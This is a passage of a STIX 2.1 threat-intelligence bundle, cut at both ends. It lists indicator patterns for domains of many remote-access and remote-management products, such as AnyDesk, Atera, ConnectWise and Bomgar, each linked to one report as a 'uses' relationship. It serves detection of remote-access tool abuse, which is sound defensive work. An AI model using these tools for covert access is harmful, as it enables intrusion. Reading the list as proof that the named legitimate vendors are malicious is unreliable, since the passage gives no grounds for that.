      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--ea7be5e9-ea48-5575-9576-6443317e3557"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--40aaabb4-98d3-5df5-ad92-7e41fa51b545",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: action1.com",
      "pattern": "[domain-name:value = 'action1.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9c423d40-c5c2-547e-9193-80df83981f7f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--40aaabb4-98d3-5df5-ad92-7e41fa51b545"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--333d16a5-d017-5285-948f-f71abd25029f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: addigy.com",
      "pattern": "[domain-name:value = 'addigy.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5084897d-205b-53c0-9e03-21dac4fc806f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--333d16a5-d017-5285-948f-f71abd25029f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bf1d8216-0b18-5cc6-9196-eb6702bcc178",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: aeroadmin.com",
      "pattern": "[domain-name:value = 'aeroadmin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--907be978-f4fd-5bed-be66-254bd29e63b0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--bf1d8216-0b18-5cc6-9196-eb6702bcc178"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--60bd7e9a-18f9-5711-90c0-3e3a33dd68b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ammyy.com",
      "pattern": "[domain-name:value = 'ammyy.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--011f5744-cbe8-54a8-a9d2-099b51930af6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--60bd7e9a-18f9-5711-90c0-3e3a33dd68b7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c3fa8089-9f16-5aa9-96e1-6dd80c8d9642",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: anydesk.com",
      "pattern": "[domain-name:value = 'anydesk.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--db52ae6b-b506-544b-8d44-b6e53b6b2543",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--c3fa8089-9f16-5aa9-96e1-6dd80c8d9642"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--61e961fd-c03a-5e15-b691-8072ea3b7627",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: anyplace-control.com",
      "pattern": "[domain-name:value = 'anyplace-control.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--709282ab-1776-5bbe-9016-f2ee7a321ec4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--61e961fd-c03a-5e15-b691-8072ea3b7627"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--aebc86c3-b05c-592c-bb1d-85eed7d02f38",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: anysupport.net",
      "pattern": "[domain-name:value = 'anysupport.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1283fe85-5787-55e4-853f-c42d35f03bbf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--aebc86c3-b05c-592c-bb1d-85eed7d02f38"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cc5d7e46-49f8-5b16-a07b-8cb44870d54b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: atera.com",
      "pattern": "[domain-name:value = 'atera.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3307b1fb-58c1-5ce9-a303-bf58a7c23857",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--cc5d7e46-49f8-5b16-a07b-8cb44870d54b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--17b47cfb-a740-55da-91d5-de617fd13769",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: aurelius.host",
      "pattern": "[domain-name:value = 'aurelius.host']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--db0ba50c-1bb1-54eb-81ad-7a25e462af41",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--17b47cfb-a740-55da-91d5-de617fd13769"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--89d698a5-f9b7-50bb-8e35-74eb640b0b0f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: auvik.com",
      "pattern": "[domain-name:value = 'auvik.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e7ecea95-c22d-5eee-a845-1949e8371ec0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--89d698a5-f9b7-50bb-8e35-74eb640b0b0f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--125faac3-e311-5884-9ca1-bcc798dc374f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: aweray.com",
      "pattern": "[domain-name:value = 'aweray.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--985a77fd-22b8-5355-ba2e-17d8ee5cc301",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--125faac3-e311-5884-9ca1-bcc798dc374f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--db5b6b9e-5cb9-5210-8f8b-bd78eca32556",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: aweray.net",
      "pattern": "[domain-name:value = 'aweray.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4cb45398-3b0e-5f1a-8df5-9a1fbe41c0ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--db5b6b9e-5cb9-5210-8f8b-bd78eca32556"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dc1f5f9a-a0ec-5ae1-8c58-4616a3ff36e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: backdrop.cloud",
      "pattern": "[domain-name:value = 'backdrop.cloud']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46b8ed47-5b97-5867-a369-65371fe7f256",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--dc1f5f9a-a0ec-5ae1-8c58-4616a3ff36e9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3050131c-0594-5f9c-9bde-43ef8d0d464b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: barracudamsp.com",
      "pattern": "[domain-name:value = 'barracudamsp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17252d62-ad42-59f7-97cb-c36e11c34632",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--3050131c-0594-5f9c-9bde-43ef8d0d464b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e47b4cd5-97a7-5647-b1dc-37d6e54e980c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: beamyourscreen.com",
      "pattern": "[domain-name:value = 'beamyourscreen.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be14bd56-02c5-5161-adbf-a3b9b45e2d51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--e47b4cd5-97a7-5647-b1dc-37d6e54e980c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--671ba783-4f37-54a5-82d4-6cd79cb252d0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: beanywhere.com",
      "pattern": "[domain-name:value = 'beanywhere.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ae434855-1667-5929-b005-65e558871bee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--671ba783-4f37-54a5-82d4-6cd79cb252d0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2830f2c3-200c-57b7-8bec-c21d16d62887",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: beinsync.com",
      "pattern": "[domain-name:value = 'beinsync.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6115b085-fd66-5db5-b512-30ab68b8d87f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--2830f2c3-200c-57b7-8bec-c21d16d62887"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a8fec858-1fc6-5659-8b58-02452994435b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: beinsync.net",
      "pattern": "[domain-name:value = 'beinsync.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--81ffe456-97e9-5b6c-b87f-c4ae18a2fee9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a8fec858-1fc6-5659-8b58-02452994435b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--759fcd01-52dd-5ab1-85c1-4874c1be3cbe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: beyondtrustcloud.com",
      "pattern": "[domain-name:value = 'beyondtrustcloud.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25f91cc8-628c-594b-b387-30d2a75dae5e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--759fcd01-52dd-5ab1-85c1-4874c1be3cbe"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--27168279-6bfb-53f7-a08e-648e7f519a01",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: bomgar.com",
      "pattern": "[domain-name:value = 'bomgar.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--96081939-3b08-5d6e-9d7d-c9bb284d1eda",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--27168279-6bfb-53f7-a08e-648e7f519a01"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a6d2ad6f-8583-50c8-b354-f481ed047afa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: bomgarcloud.com",
      "pattern": "[domain-name:value = 'bomgarcloud.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d97f277c-5e36-57c2-9a86-d7bcd3681edc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a6d2ad6f-8583-50c8-b354-f481ed047afa"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4ae64797-22b9-564a-b4e8-d240d11dfa8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: centrastage.net",
      "pattern": "[domain-name:value = 'centrastage.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5aa8e09d-04e3-5f8d-ba41-2b40c0415f81",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--4ae64797-22b9-564a-b4e8-d240d11dfa8b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a769ecb7-f0c2-505a-9712-f5652a853013",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: centuriontech.com",
      "pattern": "[domain-name:value = 'centuriontech.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb068304-4e23-5b68-844a-fbbdd48d6687",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a769ecb7-f0c2-505a-9712-f5652a853013"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--92c9348e-38da-5dd7-9fe2-b5f90c1adf30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: connectwise.com",
      "pattern": "[domain-name:value = 'connectwise.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--62237884-7fc5-52f4-a574-697b6fc2dcd4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--92c9348e-38da-5dd7-9fe2-b5f90c1adf30"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--49019cd7-53fe-57f5-aa38-b061135c54b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: crossloop.com",
      "pattern": "[domain-name:value = 'crossloop.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ab71f999-25d2-51b8-8d9f-714778bdeb34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--49019cd7-53fe-57f5-aa38-b061135c54b8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--410e699d-4b4c-5a10-a479-35cb38126851",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: dameware.com",
      "pattern": "[domain-name:value = 'dameware.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6374981a-de87-5471-84a1-e5cfb5fac578",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--410e699d-4b4c-5a10-a479-35cb38126851"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--da788ad3-f823-593c-ac23-990c52fac85d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: datto.com",
      "pattern": "[domain-name:value = 'datto.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1796b874-ac7b-5567-8b9c-6d7ac84cfe8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--da788ad3-f823-593c-ac23-990c52fac85d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e4b07984-eb6e-5107-9463-7febc2c1dec2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: datto.net",
      "pattern": "[domain-name:value = 'datto.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4da78ac9-f6c3-55ca-98cc-d2b477030ff7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--e4b07984-eb6e-5107-9463-7febc2c1dec2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--70a62f36-85f1-5e9e-a59e-6f431544cf9d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: deskday.ai",
      "pattern": "[domain-name:value = 'deskday.ai']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--50fa5e63-55a7-594a-ad41-641872a914e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--70a62f36-85f1-5e9e-a59e-6f431544cf9d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5d301636-72a4-5830-877b-28d8f2a1e18e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: deskroll.com",
      "pattern": "[domain-name:value = 'deskroll.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c098e135-a6f4-5528-aba3-9bb32e208171",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--5d301636-72a4-5830-877b-28d8f2a1e18e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cd115ff1-2154-5453-a1b8-181d60cd5698",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: desktopstreaming.com",
      "pattern": "[domain-name:value = 'desktopstreaming.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9dbbfe2b-f9d1-5c2e-84c5-d3deda647a00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--cd115ff1-2154-5453-a1b8-181d60cd5698"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b990f601-10cf-5d26-8533-ed4bdbf77501",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: distantdesktop.com",
      "pattern": "[domain-name:value = 'distantdesktop.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--81990bdf-1ca7-5c57-b0a3-2a8eaac1e03c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--b990f601-10cf-5d26-8533-ed4bdbf77501"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3f7506c4-9f16-5206-89a0-34b4bb229f5c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: donkz.nl",
      "pattern": "[domain-name:value = 'donkz.nl']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7ff2c3c3-18a8-5af5-b951-f36b8824e3e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--3f7506c4-9f16-5206-89a0-34b4bb229f5c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1be71b15-96c6-51fe-a004-e7663b3f8d3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: dwservice.net",
      "pattern": "[domain-name:value = 'dwservice.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4a3f011-2239-5af5-a7a5-fe1c6273d378",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--1be71b15-96c6-51fe-a004-e7663b3f8d3c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1cb691f9-29d8-58bf-a804-c0adedf8e67f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ehorus.com",
      "pattern": "[domain-name:value = 'ehorus.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0edd67a-2caf-5bc9-ab19-a92c95a98d47",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--1cb691f9-29d8-58bf-a804-c0adedf8e67f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5ef4a05f-58c2-5b60-8edc-67c6e4577a4b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: electric.ai",
      "pattern": "[domain-name:value = 'electric.ai']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--97326d61-c2d5-5891-90f4-6505df523958",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--5ef4a05f-58c2-5b60-8edc-67c6e4577a4b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c45cc181-449b-5510-8e8a-a0ebfaa1cd76",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: emcosoftware.com",
      "pattern": "[domain-name:value = 'emcosoftware.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35aeaf5e-559d-552d-accf-46f23fdc88bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--c45cc181-449b-5510-8e8a-a0ebfaa1cd76"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--39126ad5-221a-53a7-adf5-2c15a8345c5b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ericom.com",
      "pattern": "[domain-name:value = 'ericom.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aa0055b4-1efe-511d-8af0-3c795036e43c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--39126ad5-221a-53a7-adf5-2c15a8345c5b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2d5884be-0b32-5068-bdf1-4bf16a318453",
